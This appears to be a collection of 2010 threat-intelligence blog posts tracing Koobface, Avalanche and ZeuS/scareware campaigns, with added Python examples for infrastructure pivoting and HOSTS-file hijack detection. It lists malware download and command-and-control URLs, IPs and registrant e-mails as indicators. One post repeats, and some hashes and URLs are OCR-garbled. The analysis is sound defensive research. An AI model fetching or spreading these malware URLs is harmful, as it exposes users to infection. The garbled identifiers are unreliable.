Detection rates for the malware pushed from the same IP where a key Koobface botnet C&C is hosted:

- 55.pdf - [7]JS:Pdfka-gen; Exploit.JS.Pdfka.blf - Result: 23/41 (56.1 %)

- dm.exe - [8]Trojan:Win32/Alureon.CT; Mal/TDSSPack-Q - Result: 36/41 (87.81 %)

- wsc.exe - [9]Net-Worm.Win32.Koobface; Trojan.FakeAV - Result: 36/41 (87.81 %)

The same michaeltycoon@gmail.com used to register Izabslwvn538n4i5tcjl.com was also profiled in the "[10]Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang" assessment.

Given that enough historical OSINT is available, the cybercrime ecosystem can be a pretty small place.
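The pivoting done by hand above, as an added example that is not the post's own code: the records are transcribed from the domains, IPs, AS numbers and registrant e-mails the post names, while the evidence weights and the widest-path search are analyst conventions chosen here. It answers the post's question of how strong each link to the Koobface gang's infrastructure is, and through which shared attribute it runs.

```python
"""Infrastructure pivoting over the indicators named in this post (added example)."""
import heapq
from collections import defaultdict

# (indicator, attribute kind, attribute value), as stated in the post
RECORDS = [
    ("zettapetta.com", "ip", "109.196.143.56"),            # DreamHost campaign redirector
    ("zettapetta.com", "asn", "AS39150"),
    ("zettapetta.com", "email", "hilarykneber@yahoo.com"),
    ("yahoo-statistic.com", "email", "hilarykneber@yahoo.com"),
    ("kdjkfjskdfjlskdjf.com", "ip", "91.188.59.98"),       # same gang, previous campaigns
    ("kdjkfjskdfjlskdjf.com", "asn", "AS6851"),
    ("ns1.oklahomacitycom.com", "ip", "91.188.59.98"),
    ("ns1.oklahomacitycom.com", "asn", "AS6851"),
    ("urodinam.net", "ip", "91.188.59.10"),                # Koobface C&C
    ("urodinam.net", "asn", "AS6851"),
    ("Izabslwvn538n4i5tcjl.com", "ip", "91.188.59.10"),    # exploit kit on the Koobface IP
    ("Izabslwvn538n4i5tcjl.com", "asn", "AS6851"),
    ("Izabslwvn538n4i5tcjl.com", "email", "michaeltycoon@gmail.com"),
    ("get-money-now.net", "ip", "91.188.59.211"),          # from the iTunes/CV campaign post
    ("get-money-now.net", "asn", "AS6851"),
    ("get-money-now.net", "email", "noxim@maidsf.ru"),
]

# Evidence weight per shared attribute (convention chosen here): a shared registrant
# e-mail or IP points at common control; a shared AS only says both are customers of
# the same hosting provider, the weakest of the three explanations the post offers.
WEIGHT = {"email": 3, "ip": 3, "asn": 1}
LABEL = {3: "strong", 1: "weak"}


def build_graph(records):
    """Bipartite graph: indicator nodes <-> attribute nodes, edge weight = WEIGHT[kind]."""
    adj = defaultdict(list)
    for ind, kind, val in records:
        a, b, w = ("indicator", ind), (kind, val), WEIGHT[kind]
        adj[a].append((b, w))
        adj[b].append((a, w))
    return adj


def widest_path(adj, src, dst):
    """Path from src to dst that maximizes its weakest edge (bottleneck).
    Returns (bottleneck, [nodes]) or None when dst is unreachable."""
    best, prev = {src: float("inf")}, {}
    heap = [(-float("inf"), src)]          # max-heap on path width
    while heap:
        neg, node = heapq.heappop(heap)
        width = -neg
        if node == dst:
            break
        if width < best.get(node, -1):     # stale entry
            continue
        for nxt, w in adj[node]:
            cand = min(width, w)
            if cand > best.get(nxt, -1):
                best[nxt], prev[nxt] = cand, node
                heapq.heappush(heap, (-cand, nxt))
    if dst not in best:
        return None
    path, n = [dst], dst
    while n != src:
        n = prev[n]
        path.append(n)
    return best[dst], path[::-1]


def pivot(records, seed, target):
    """How seed and target connect: strength label plus the shared attributes on the way."""
    src, dst = ("indicator", seed), ("indicator", target)
    if src == dst:
        return {"strength": "identical", "via": []}
    res = widest_path(build_graph(records), src, dst)
    if res is None:
        return {"strength": "none", "via": []}
    width, path = res
    return {"strength": LABEL[width],
            "via": [f"{kind}={val}" for kind, val in path if kind != "indicator"]}


if __name__ == "__main__":
    for seed in ("kdjkfjskdfjlskdjf.com", "Izabslwvn538n4i5tcjl.com",
                 "get-money-now.net", "zettapetta.com"):
        print(seed, "->", "urodinam.net", pivot(RECORDS, seed, "urodinam.net"))
```

Only the exploit-kit domain parked on the Koobface IP gets a strong link; the DreamHost gang's domains and the iTunes/CV campaign reach urodinam.net solely through AS6851, which is exactly the "customers of the same hosting provider" caveat the post raises.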

Related posts: 

[11]U.S. Treasury Site Compromise Linked to the NetworkSolutions Mass WordPress Blogs Compromise

[12]GoDaddy's Mass WordPress Blogs Compromise Serving Scareware

[13]Dissecting the WordPress Blogs Compromise at Network Solutions

Hilary Kneber related activity: 

[14] The Kneber botnet - FAQ 


[15] Celebrity-Themed Scareware Campaign Abusing 
DocStoc 

[16] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[17] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 
Spamvertised iTunes Gift Certificates and CV Themed Malware Campaigns (2010-05-13 20:16)

What do the recently spamvertised [1]"Thank you for buying iTunes Gift Certificate!" and the "Look at my CV!" themed malware campaigns have in common?

It's the fact that they've been launched by the same individual/gang. What's particularly interesting about the campaign is that it's relying on a currently compromised web server with a publicly accessible [2]PHP based backdoor. This exact [3]same approach is also used by the Koobface gang on a large scale, in order to efficiently [4]control the compromised sites involved in their Facebook spreading campaigns.

Moreover, upon successful infection the campaign is not just pushing scareware; evidence based on the binaries found within the directory indicates that a ZeuS crimeware binary has been in circulation for a while. Let's dissect the campaign and establish the obvious connection.

Detection rates, phone back locations

- iTunes certificate _497.exe - [5]TrojanDropper:Win32/Oficla.G - Result: 39/41 (95.12 %)

Upon execution phones back to:

- davidopolko.ru/migel/bb.php?v=200&id=554905388&b=6may&tm=3

- jaazle.com/wp-includes/js/tinymce/themes/advanced/psihi.exe

- phishi.exe - [6]Gen:Trojan.HeurTP.bmX@bins2Eb; Backdoor.Win32.Protector.ao - Result: 24/41 (58.54 %), ultimately dropping scareware on the infected host.

Both campaigns are related, since they use the same command and control server, which is periodically updated with new URLs consisting of compromised sites. The detection rates and phone back locations for the second campaign are as follows:

- My Resume _218.exe - [7]W32/Oficla.O; Gen:Variant.Bredo.4 - Result: 17/41 (41.46 %)

Upon execution the sample phones back to the following URLs, in an attempt to drop the related binaries:

- davidopolko.ru/migel/bb.php?v=200&id=636608811&b=12may&tm=2 - 195.78.108.201 - Email: vadim.rinatovich@yandex.ru

- topcarmitsubishi.com.br/_vti_bin/_vti_adm/psi.exe - 201.76.146.215

- davidopolko.ru/psi.exe; davidopolko.ru/setupse2010.exe

topcarmitsubishi.com.br appears to be a compromised site with an open directory, which makes obtaining the rest of the binaries used by the same gang/individual easier.

Detection rates for the binaries within the open directory, including the dropped scareware:

- psi.exe - [8]TrojanDownloader:Win32/Cutwail.gen!C; Backdoor.Win32.Protector.at - Result: 17/41 (41.47 %)

- sofgold.exe - [9]Trojan.Fakealert.14822; W32/Junkcomp.A - Result: 15/41 (36.59 %)

- sp.exe - [10]PWS:Win32/Zbot.gen!R; a variant of Win32/Kryptik.EGZ - Result: 5/41 (12.2 %)

- ustest.exe - [11]Net-Worm.Win32.Kolab - Result: 4/41 (9.76 %)

- firewall.dll - [12]Trojan:Win32/Fakeinit; Win32/TrojanDownloader.FakeAlert.A5l - Result: 20/40 (50 %)

- SetupSE2010.exe - [13]W32/FakeAV.AM!genr; CoreGuardAntivirus2009 - Result: 29/41 (70.74 %)
Phone back locations, C&Cs of the 4 samples:

[14]mystaticdatas.ru/basel/ess.cfg - 195.88.144.63, AS48984, VLAF-AS Vlaf Processing Ltd - Email: mail2businessman@gmail.com - [15]same email has been profiled before

get-money-now.net/loads.php?code=000000000048170 - 91.188.59.211, [16]AS6851, BKCNET "SIA" IZZI - Email: noxim@maidsf.ru

get-money-now.net/firewall.dll

get-money-now.net/cgi-bin/ware.cgi?adv=000000000048170

mamapapalol.com/cgi-bin/get.pl?1=000000000048170 - 88.80.4.19, AS33837, PRQ-AS - Email: security2guard@gmail.com


Related domains parked on 88.80.4.19 (mamapapalol.com/cgi-bin/get.pl?1=000000000048170):


Updates will be posted as soon as they switch to a new theme or introduce new monetization tactics.

This post has been reproduced from [17]Dancho 
Danchev's blog. Follow him [18]on Twitter. 
http://www.virustotal.com/analisis/306d49c93al9585487elaefd4018f5cca2f94c5acd83410ac84370b4delbc4d6-1273674668

12. http://www.virustotal.com/reanalisis.html?e83ffb0315226e5192e8247f859ad7abf3914d858f6dd2dhd8C7da97815ff0a2-1273675323

13. http://www.virustotal.com/analisis/85272f56d400d8d56ee5474f7fl6f63ec0f571e696feeb4be286938259f41ada-1273675693

14. https://zeustracker.abuse.ch/monitor.php?host=mystaticdatas.ru

15. http://ddanchev.blogspot.com/2009/12/celebrity-themed-scareware-campaign.html

16. http://ddanchev.blogspot.com/2010/05/dissecting-mass-dreamhost-sites.html

17. http://ddanchev.blogspot.com/

18. http://twitter.com/danchodanchev
The Avalanche Botnet and the TROYAK-AS Connection (2010-05-13 22:14)

According to the latest [1]APWG Global Phishing Survey:

• "But by mid-2009, phishing was dominated by one player as never before: the Avalanche phishing operation. This criminal entity is one of the most sophisticated and damaging on the Internet, and perfected a mass-production system for deploying phishing sites and "crimeware" - malware designed specifically to automate identity theft and facilitate unauthorized transactions from consumer bank accounts. Avalanche was responsible for two-thirds (66 %) of all phishing attacks launched in the second half of 2009, and was responsible for the overall increase in phishing attacks recorded across the Internet."

The [2]Avalanche botnet's ecosystem is described by PhishLabs as:

• "[3]Cutwail aka Pushdo is a spamming trojan being used to send out [4]massive amounts of spam with links (or lures) to phishing pages or pages that ask the users to download and run programs. Those programs invariably turn out to be instances of the [5]Zeus/ZBot/WNSPOEM banking Trojan. There are also unrelated criminals that also use Zeus Trojans to steal online banking information that are not related to this set of scams.

The Avalanche botnet is the middle-step between the spamming botnet and Trojans that steal banking information. It is basically a hosting platform used by the attackers. Because the Avalanche bots act as a simple proxy, and there are thousands of them, it has been exceedingly difficult to shut down the phish pages. Instead most Anti-Phishing organizations have focused on shutting down the domain names that were used in the phishing URLs."
One of the most notable facts about the botnet's operators is their persistent interaction with the [6]TROYAK-AS cybercrime-friendly ISP, where they used to host a huge percentage of their ZeuS C&Cs, next to the client-side exploit serving iFrame domains/IPs found on each and every one of their phishing pages. The following chronology exclusively details their client-side exploit/ZeuS crimeware serving campaigns.

The Avalanche Botnet's ZeuS crimeware/client-side exploit serving campaigns, in chronological order:

[7] Zeus Crimeware/Client-Side Exploits Serving Campaign in the Wild

[8] Scareware, Sinowal, Client-Side Exploits Serving Spam Campaign in the Wild

[9] IRS/PhotoArchive Themed Zeus/Client-Side Exploits Serving Campaign in the Wild

[10] Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild

[11] PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild

[12] Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side Exploits

[13] Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams

[14] Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware

[15] Pushdo Injecting Bogus Swine Flu Vaccine

[16] "Your mailbox has been deactivated" Spam Campaign Serving Crimeware

[17] Ongoing FDIC Spam Campaign Serves Zeus Crimeware

[18] The Multitasking Fast-Flux Botnet that Wants to Bank With You

Related articles on TROYAK-AS, and various cybercrime trends:

[19] TROYAK-AS: the cybercrime-friendly ISP that just won't go away

[20] AS-Troyak Exposes a Large Cybercrime Infrastructure

[21] The current state of the crimeware threat - Q&A

[22] Report: ZeuS crimeware kit, malicious PDFs drive growth of cybercrime

[23] Report: Malicious PDF files comprised 80 percent of all exploits for 2009

This post has been reproduced from [24]Dancho 
Danchev's blog. Follow him [25]on Twitter. 

1. http://www.antiphishing.org/reports/APWG_GlobalPhishingSurvey_2H2009.pdf

2. http://www.phishlabs.com/blog/

3. http://www.zdnet.com/blog/security/cutwail-botnet-spamming-irs-unreported-income-themed-malware/4260

4. http://us.trendmicro.com/imperia/md/content/us/pdf/threats/securitylibrary/study_of_pushdo.pdf

5. http://www.secureworks.com/research/threats/zeus/?threat=zeus

6. http://ddanchev.blogspot.com/2010/03/as50215-troyak-as-taken-offline-zeus-c.html

7. http://ddanchev.blogspot.com/2010/03/zeus-crimewareclient-side-exploits.html

8. http://ddanchev.blogspot.com/2010/03/scareware-sinowal-client-side-exploits.html

9. http://ddanchev.blogspot.com/2010/02/irsphotoarchive-themed-zeusclient-side.html

10. http://ddanchev.blogspot.com/2010/02/tax-report-themed-zeusclient-side.html

11. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html

12. http://ddanchev.blogspot.com/2010/01/facebookaol-update-tool-spam-campaign.html

13. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html

14. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

15. http://ddanchev.blogspot.com/2009/12/pushdo-injecting-bogus-swine-flu.html

16. http://ddanchev.blogspot.com/2009/11/your-mailbox-has-been-deactivated-spam.html

17. http://ddanchev.blogspot.com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.html

18. http://ddanchev.blogspot.com/2009/07/multitasking-fast-flux-botnet-that.html

19. http://www.zdnet.com/blog/security/troyak-as-the-cybercrime-friendly-isp-that-just-wont-go-away/5761

20. http://rsa.com/blog/blog_entry.aspx?id=1610

21. http://www.zdnet.com/blog/security/the-current-state-of-the-crimeware-threat-q-a/5797

22. http://www.zdnet.com/blog/security/report-zeus-crimeware-kit-malicious-pdfs-drive-growth-of-cybercrime/62

23. http://www.zdnet.com/blog/security/report-malicious-pdf-files-comprised-80-percent-of-all-exploits-for-2009/5473

24. http://ddanchev.blogspot.com/

25. http://twitter.com/danchodanchev
Koobface Gang Responds to the "10 Things You Didn't Know About the Koobface Gang" Post (2010-05-17 21:23)

UPDATED Monday, May 24, 2010: The scareware domains/redirectors pushed by the Koobface botnet are covered at the bottom of this post, including detection rates and phone back URLs.

On May 13th, 2010, the Koobface gang responded to my "[1]10 things you didn't know about the Koobface gang" post published in February, 2010, by including the following message within Koobface-infected hosts serving bogus video players and, of course, scareware:

• regarding this [2]article By Dancho Danchev / February 23, 2010, 9:30am PST

1. no connection 2. what's reason to buy software just for one screenshot? 3. no connection 4. :) 5. :) 6. :) 7. it was 'ali baba & 4' originally, you should be more careful 8. heh 9. strange error there're no experiments on that 10. maybe, not 100 % sure

Ali Baba 13 may 2010

This is the [3]second individual message left by the botnet masters for me, and the third one in general where I'm referenced.

What makes an impression is their/his attempt to distance themselves/himself from major campaigns affecting high-profile U.S.-based web properties and from fraudulent activities such as click fraud, and their/his attempt to legitimize their/his malicious activities by emphasizing the fact that they/he are not involved in crimeware campaigns and have never stolen any credit card details.

01. [4]The gang is connected to, probably maintaining the click-fraud facilitating Bahama botnet

- Koobface gang: no connection
You wish, you wish. [5]ClickForensics pointed it out, [6]I confirmed it, and at a later stage reproduced it.

Among the many examples of this activity is MD5: Ofbfla9f8e6e305138151440da58b4fl, modifying the HOSTS file on the infected PCs to [7]redirect all the Google and Yahoo search traffic to 89.149.210.109, while in [8]between phoning back to well known [9]Koobface scareware C&Cs at the time, such as 212.117.160.18 and urodinam.net/8732489273.php.
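The HOSTS-file redirection described above is straightforward to check for on an endpoint. The following is an added example, not code from the original post: a small Python parser that flags HOSTS entries pinning Google or Yahoo hostnames to anything other than a loopback or unspecified address. The watch list, the sample HOSTS content and the 192.0.2.10 address (TEST-NET-1) are constructed for the example.

```python
"""Flag HOSTS-file entries that pin search-engine hostnames to a foreign address.

Added example (not code from the original post). The post describes a Koobface
sample rewriting the HOSTS file so that Google and Yahoo search traffic goes to
an attacker-controlled IP. This parser reads HOSTS-file text and reports every
entry that maps a watched domain, or any subdomain of it, to an address that is
not loopback or unspecified. The watch list, the sample HOSTS content and the
192.0.2.10 address (TEST-NET-1) are constructed for the example.
"""
import ipaddress

# Domains an end-user HOSTS file should never resolve somewhere else (assumed list).
WATCHED_DOMAINS = ("google.com", "yahoo.com")


def _is_benign_target(ip: str) -> bool:
    """True for 127.0.0.1 / ::1 / 0.0.0.0-style pins, which block rather than redirect.

    Unparseable addresses return False, so a mangled entry for a watched name
    is still reported.
    """
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_unspecified


def _matches_watched(hostname: str) -> bool:
    """Case-insensitive match against the watch list (exact name or subdomain)."""
    h = hostname.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in WATCHED_DOMAINS)


def parse_hosts(text: str):
    """Yield (ip, hostname) pairs from HOSTS-file text.

    '#' comments and blank lines are ignored; a line that lists several names
    after one address yields one pair per name.
    """
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        fields = line.split()
        if len(fields) < 2:
            continue
        ip, names = fields[0], fields[1:]
        for name in names:
            yield ip, name


def find_hijacks(text: str):
    """Return sorted (hostname, ip) pairs that redirect a watched domain."""
    hits = {
        (name.lower(), ip)
        for ip, name in parse_hosts(text)
        if _matches_watched(name) and not _is_benign_target(ip)
    }
    return sorted(hits)


# Constructed sample: normal localhost lines, a blocklist-style pin (benign), and
# two redirecting lines of the kind the post describes.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost
# blocklists pin ad domains to 0.0.0.0; that blocks, it does not redirect
0.0.0.0         ads.example.net
0.0.0.0         www.google.com     # pinned to the unspecified address: benign
192.0.2.10      www.google.com google.com
192.0.2.10      search.yahoo.com   # constructed attacker IP (TEST-NET-1)
"""

if __name__ == "__main__":
    for host, ip in find_hijacks(SAMPLE_HOSTS):
        print(f"HOSTS hijack: {host} -> {ip}")
```

On a live system, feed the function the contents of %SystemRoot%\System32\drivers\etc\hosts (or /etc/hosts) instead of the constructed sample.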

In May, 2010, parked on the very same IP to which urodinam.net (91.188.59.10) is currently responding is an active [10]client-side exploits serving campaign using the YES malware exploitation kit (Izabslwvn538n4i5tcjl.com - Email: michaeltycoon@gmail.com).

I can go on forever.

02. [11]Despite their steady revenue flow from sales of scareware, the gang once used trial software to take a screenshot of a YouTube video

- Koobface gang: what's reason to buy software just for one screenshot?

No reason at all, I guess that's also the reason behind the temporary change in [12]scareware URIs to include GREED within the file name.

03. [13]The Koobface gang was behind the malvertising attack that hit the web site of the New York Times in September

- Koobface gang: no connection

You wish, you wish.

In fact, several of the recent high-profile malvertising campaigns that targeted major Web 2.0 properties can also be traced back to their infrastructure. Now, whether they are aware of the true impact of the malvertisement campaign, and whether they are intentionally pushing it at a particular web site, remains unknown.

The fact is that the exact [14]same domain that was used in the NYTimes redirection was also, back then, embedded on all of the Koobface infected hosts in order to serve scareware.

04. [15]The gang conducted a several hours experiment in November, 2009 when for the first time ever client-side exploits were embedded on Koobface-serving compromised hosts

- Koobface gang: :)

He who smiles last, smiles best.

05. [16]The Koobface gang was behind the massive (1+ million affected web sites) scareware serving campaign in November, 2009

- Koobface gang: :)

Since they're admitting their involvement in point 5, they also don't know, or forget, that the [17]connection between the Koobface gang and the massive blackhat SEO campaign was established in exactly the same way as their involvement in the NYTimes malvertising campaign. Convenient denial of involvement in high-profile campaigns means nothing when the collected data speaks for itself.

06. [18]The Koobface Gang Monetizes Mac OS X Traffic through adult dating/Russian online movie marketplaces

- Koobface gang: :)

Read more on the practice - "[19]How the Koobface Gang Monetizes Mac OS X Traffic".
07. [20]Ali Baba and 40 LLC a.k.a the Koobface gang greeted the security community on Christmas

- Koobface gang: it was 'ali baba & 4' originally you should be more careful

Since the original [21]Ali Baba had 40 thieves with him, not 4, the remaining 36 can be best described as the cybercrime ecosystem's stakeholders earning revenues and having their business models scale, thanks to the involvement of the Koobface botnet.

08. [22]The Koobface gang once redirected Facebook's IP space to my personal blog

- Koobface gang: heh

Read more on the topic - "[23]Koobface Botnet Redirects Facebook's IP Space to my Blog".

09. [24]The gang is experimenting with alternative propagation strategies, such as for instance Skype

- Koobface gang: strange error, there're no experiments on that

Hmm, who should I trust? [25]SophosLabs and [26]TrendMicro or the Koobface gang? SophosLabs and Trend Micro or the Koobface gang? SophosLabs and Trend Micro or....well you get the point. Of course there isn't, now that it's publicly known it's in the works.

10. [27]The gang is monetizing traffic through the Crusade Affiliates scareware network

- Koobface gang: maybe, not 100 % sure

They don't know where they get all the money from pushing scareware? How convenient.

When data and facts talk, even "CyberJesus" listens. Read more on the monetization model - "[28]Koobface Botnet's Scareware Business Model" and "[29]Koobface Botnet's Scareware Business Model - Part Two".

The Koobface botnet is currently pushing scareware through:

2gig-antivirus.com?mid=312&code=4dbl2f&d=l&s=2 - 195.5.161.210 - Email: test@now.net.cn
Parked on the same IP (195.5.161.210, AS31252, STARNET-AS StarNet Moldova) are also dozens of related scareware domains, all registered to test@now.net.cn.

- setup.exe - [30]Gen:Variant.Koobface.2; W32.Koobface - Result: 15/40 (37.5 %)

- MalvRem_312s2.exe - [31]W32/FakeAlert.5.'Maximus; Trojan.Win32.FakeAV - Result: 10/41 (24.4 %), which once executed phones back to:

- slsystem.com/download/winlogo.bmp - 91.213.157.104, AS13618, CARONET-AS - Email: contact@privacy-protect.cn

- networki10.com - 91.213.217.106, AS42473, ANEXIA-AS - Email: contact@privacy-protect.cn

UPDATED: Wednesday, May 19, 2010:

The current redirection taking place through the embedded link on Koobface infected hosts goes through:

- www3.coantys-48td.xorg.pl - 188.124.5.66 - AS44565, VITAL TEKNOLOJI

- www1.fastsearch.cz.cc - 207.58.177.96 - AS25847, SERVINT ServInt Corporation

Detection rates:

- setup.exe - [32]Win32/Koobface.NCX; Gen:Variant.Koobface.2 - Result: 13/41 (31.71 %)

- packupdate_build107_2039.exe - [33]W32/FakeAV.AM!genr; Mal/FakeAV-AX - Result: 8/41 (19.52 %)

Upon execution, the scareware sample phones back to:

update1.myownguardian.com - 94.228.209.223, AS47869, NETROUTING-AS - Email: gkook@checkjemail.nl

update2.myownguardian.net - 93.186.124.92, AS44565, VITAL TEKNOLOJI - Email: gkook@checkjemail.nl

UPDATED Monday, May 24, 2010:

The Koobface scareware domains/redirectors pushed by the Koobface gang over the past 7 days all continue using the services of AS31252, STARNET-AS StarNet Moldova at 195.5.161.210 and 195.5.161.211.
Detection rates:

- setup.exe - [34]Net-Worm:W32/Koobface.HN; Mal/Koobface-D - Result: 11/41 (26.83 %)

- avdistr_312.exe - [35]Trojan.FakeAV!gen24; Trojan.FakeAV - Result: 8/41 (19.52 %)

Upon execution phones back to:

slsystem.com/download/winlogo.bmp - 91.213.157.104 - Email: contact@privacy-protect.cn

accsupdate.com/?b=l03si - 193.105.134.115 - Email: contact@privacy-protect.cn

Previously parked on 91.213.217.106, AS42473, ANEXIA-AS, now responding to 193.105.134.115, AS42708, PORTLANE:

networki10.com - Email: contact@privacy-protect.cn

winsecuresoftorder.com - Email: contact@privacy-protect.cn

time-zoneserver.com - Email: contact@privacy-protect.cn

lblacklist.com - Email: contact@privacy-protect.cn

In order to understand the importance of profiling the Koobface gang's activities, consider going through their underground multitasking campaigns in the related posts.

Related Koobface botnet/Koobface gang research:

[36] From the Koobface Gang with Scareware Serving Compromised Sites

[37] Dissecting Koobface Gang's Latest Facebook Spreading Campaign

[38] Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova

[39] 10 things you didn't know about the Koobface gang

[40] A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang

[41] How the Koobface Gang Monetizes Mac OS X Traffic

[42] The Koobface Gang Wishes the Industry "Happy Holidays"

[43] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline

[44] Koobface Botnet Starts Serving Client-Side Exploits

[45] Massive Scareware Serving Blackhat SEO, the Koobface Gang Style

[46] Koobface Botnet's Scareware Business Model - Part Two

[47] Koobface Botnet's Scareware Business Model - Part One

[48] Koobface Botnet Redirects Facebook's IP Space to my Blog

[49] New Koobface campaign spoofs Adobe's Flash updater

[50] Social engineering tactics of the Koobface botnet

[51] Koobface Botnet Dissected in a Trend Micro Report

[52] Movement on the Koobface Front - Part Two

[53] Movement on the Koobface Front

[54] Koobface - Come Out, Come Out, Wherever You Are

[55] Dissecting Koobface Worm's Twitter Campaign

This post has been reproduced from [56]Dancho Danchev's blog. Follow him [57]on Twitter.
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Koobface Gang Responds to the "10 Things You Didn't Know About the Koobface Gang Post" (2010-05-17 21:23)

UPDATED Monday, May 24, 2010: The scareware domains/redirectors pushed by the Koobface botnet have been included at the bottom of this post, including detection rates and phone back URLs.

On May 13th, 2010, the Koobface gang responded to my "[1]10 things you didn't know about the Koobface gang" post published in February, 2010, by including the following message within Koobface-infected hosts, serving bogus video players, and, of course, scareware:

• regarding this [2]article By Dancho Danchev / February 23, 2010, 9:30am PST

1. no connection 2. what's reason to buy software just for one screenshot? 3. no connection 4. :) 5. :) 6. :) 7. it was 'ali baba & 4' originally, you should be more careful 8. heh 9. strange error there're no experiments on that 10. maybe, not 100 % sure

Ali Baba 13 may 2010

This is the [3]second individual message left by the botnet masters for me, and the third one in general where I'm referenced.

What makes an impression is their/his attempt to distance themselves/himself from major campaigns affecting high profile U.S based web properties and from fraudulent activities such as click fraud, and their/his attempt to legitimize their/his malicious activities by emphasizing the fact that they/he are not involved in crimeware campaigns, and have never stolen any credit card details.

01. [4]The gang is connected to, probably maintaining, the click-fraud facilitating Bahama botnet

- Koobface gang: no connection

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You wish, you wish. [5]ClickForensics pointed it out, [6]I confirmed it, and at a later stage reproduced it.

Among the many examples of these activities is MD5: 0fbf1a9f8e6e305138151440da58b4f1, modifying the HOSTS file on the infected PCs to [7]redirect all the Google and Yahoo search traffic to 89.149.210.109, whereas, in [8]between, phoning back to well known [9]Koobface scareware C&Cs at the time, such as 212.117.160.18 and urodinam.net/8732489273.php.

In May, 2010, parked on the very same IP to which urodinam.net (91.188.59.10) is currently responding, is an active [10]client-side exploits serving campaign using the YES malware exploitation kit (Izabslwvn538n4i5tcjl.com - Email: michaeltycoon@gmail.com).

I can go on forever.
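The HOSTS-file modification described above is one of the simplest host-level indicators a defender can check for. The following is an added example, not the post's own code, that parses a hosts file and flags entries pinning search-engine or AV-vendor hostnames to any address: a remote IP means traffic for that name is being hijacked, a loopback address means the site is being blocked (the usual trick for cutting off AV updates). The file content, the watched-domain list and all entries other than the 89.149.210.109 redirect target are constructed for this example.

```python
import ipaddress
import sys

# Constructed sample of a tampered hosts file. Only the 89.149.210.109
# redirect target comes from the post; every other line is made up here.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
89.149.210.109  www.google.com google.com
89.149.210.109  search.yahoo.com www.yahoo.com
127.0.0.1       www.symantec.com   # update blocking
192.168.1.10    intranet.example.test
not-an-ip       junk.example.test
"""

# Domains that have no business being pinned in HOSTS on a workstation.
# Illustrative list for this example; extend it with your own vendors.
WATCHED_SUFFIXES = (
    "google.com", "yahoo.com", "bing.com",
    "symantec.com", "mcafee.com", "kaspersky.com",
)

# Standard hosts-file locations, keyed by sys.platform.
HOSTS_PATHS = {
    "win32": r"C:\Windows\System32\drivers\etc\hosts",
    "default": "/etc/hosts",
}


def parse_hosts(text):
    """Return (ip, hostname) pairs from hosts-file text.

    Comments (after '#') and blank lines are skipped; lines whose first
    field is not an IP address are ignored rather than raising.
    """
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for host in fields[1:]:
            pairs.append((str(ip), host.lower()))
    return pairs


def is_watched(host):
    """True if host is one of the watched domains or a subdomain of one."""
    return any(host == s or host.endswith("." + s) for s in WATCHED_SUFFIXES)


def suspicious_entries(text):
    """Flag watched hostnames pinned to any address.

    A loopback/unspecified target blocks the site; anything else silently
    redirects traffic for that name, which is what the post's sample did
    to Google and Yahoo search traffic.
    """
    findings = []
    for ip, host in parse_hosts(text):
        if not is_watched(host):
            continue
        addr = ipaddress.ip_address(ip)
        kind = "blocked" if addr.is_loopback or addr.is_unspecified else "redirected"
        findings.append((host, ip, kind))
    return findings


def audit_file(path=None):
    """Read a hosts file from disk (platform default if no path) and audit it."""
    if path is None:
        path = HOSTS_PATHS.get(sys.platform, HOSTS_PATHS["default"])
    with open(path, encoding="utf-8", errors="replace") as fh:
        return suspicious_entries(fh.read())


if __name__ == "__main__":
    # With no argument, audit the constructed sample; otherwise the given path.
    results = audit_file(sys.argv[1]) if len(sys.argv) > 1 else suspicious_entries(SAMPLE_HOSTS)
    for host, ip, kind in results:
        print(f"{kind:10s} {host:25s} -> {ip}")
```

Run it without arguments to see the sample findings, or pass a path to audit a real hosts file; on a clean workstation the watched names should never appear at all, so any finding is worth a look.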

02. [11]Despite their steady revenue flow from sales of scareware, the gang once used trial software to take a screenshot of a YouTube video

- Koobface gang: what's reason to buy software just for one screenshot?

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No reason at all, I guess that's also the reason behind the temporary change in [12]scareware URIs to include GREED within the file name.

03. [13]The Koobface gang was behind the malvertising attack that hit the web site of the New York Times in September

- Koobface gang: no connection

You wish, you wish.

In fact, several of the recent high-profile malvertising campaigns that targeted major Web 2.0 properties can also be traced back to their infrastructure. Now, whether they are aware of the true impact of the malvertisement campaign, and whether they are intentionally pushing it at a particular web site, remains unknown.

The fact is that the exact [14]same domain that was used in the NYTimes redirection was also, back then, embedded on all of the Koobface infected hosts in order to serve scareware.

04. [15]The gang conducted a several hours experiment in November, 2009 when for the first time ever client-side exploits were embedded on Koobface-serving compromised hosts

- Koobface gang: :)

He who smiles last, smiles best.

05. [16]The Koobface gang was behind the massive (1+ million affected web sites) scareware serving campaign in November, 2009

- Koobface gang: :)

Since they're admitting their involvement in point 5, they also don't know/forget that one of the many ways the [17]connection between the Koobface gang and the massive blackhat SEO campaign was established is exactly the way their involvement in the NYTimes malvertising campaign was established. Convenient denial of involvement in high-profile campaigns means nothing when the collected data speaks for itself.

06. [18]The Koobface Gang Monetizes Mac OS X Traffic through adult dating/Russian online movie marketplaces

- Koobface gang: :)

